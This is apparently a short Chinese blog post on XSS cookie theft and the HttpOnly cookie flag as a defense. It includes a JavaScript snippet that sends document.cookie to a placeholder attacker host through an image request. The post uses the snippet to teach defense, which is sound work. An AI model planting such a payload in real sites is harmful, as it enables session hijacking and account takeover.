web开发安全之xss - cookie窃取

做为web开发者，我们知道；当我们登录一个网页系统的时候，服务器会写一些cookie到我们的浏览器里(php默认的是 PHPSESSID );来记录用户登录状态。
当下次再访问其它页面的时候，浏览器会自动传递此cookie。

服务器通过这个传递过来对应的cookie来判定用户身份,从而返回与此用户相关数据的页面。

**然而，浏览器客户端脚本语言javascript是可以通过 document.cookie 来得到cookie的。**

那么如果所在的系统，存在xss漏洞。被值入如下js代码段
```html
var img = document.createElement('img');
img.src = 'http://ooxx.com?c=' + encodeURIComponent(document.cookie);
document.getElementsByTagName('body')[0].appendChild(img);
```
这样就会，你把用户的cookie窃取。以img标 src的请求方式，发送到操蛋者(http://ooxx.com)的服务器中记录下来（记录的方式,有很多种。其中最简单的。nginx 的access.log日志若开启了，便会记录下来）。
黑客，拿到你的cookie登录凭证，就可以用你的身份。搞破坏了。。。

那么为了应对防止web开发，防不胜防的xss漏洞；而导致登录凭证被窃取。

伟大的人类发觉了此问题的严重性，为了杜绝cookie登录凭证被获取。

于是想到了，那出的问题，从那着手。
不是就是由于js能够通过document.cookie来获取浏览器cookie吗？
那么我们就给cookie定下个标识。定了个协义，如果有此标识的cookie的,不允许js获取。这个标识就是我们常见的httponly

以php语言为例,设置cookie的httponly语法如下.
![](http://image.gwalker.cn/Uploads_ArticleFiles_20160314_m_56e68a57b8ee5.png!show)

![](http://image.gwalker.cn/Uploads_ArticleFiles_20160314_m_56e68a7711472.png!show)

其中有一段说明，翻译过来是

**当httponly设置为ture。那么cookie不会被javascript获取。**这表明这种设置可以有效的减少xss攻击而造成的身份盗窃（并不是所有的浏览器都支持）。

可喜的是现在不支持httponly的浏览器，要绝种了。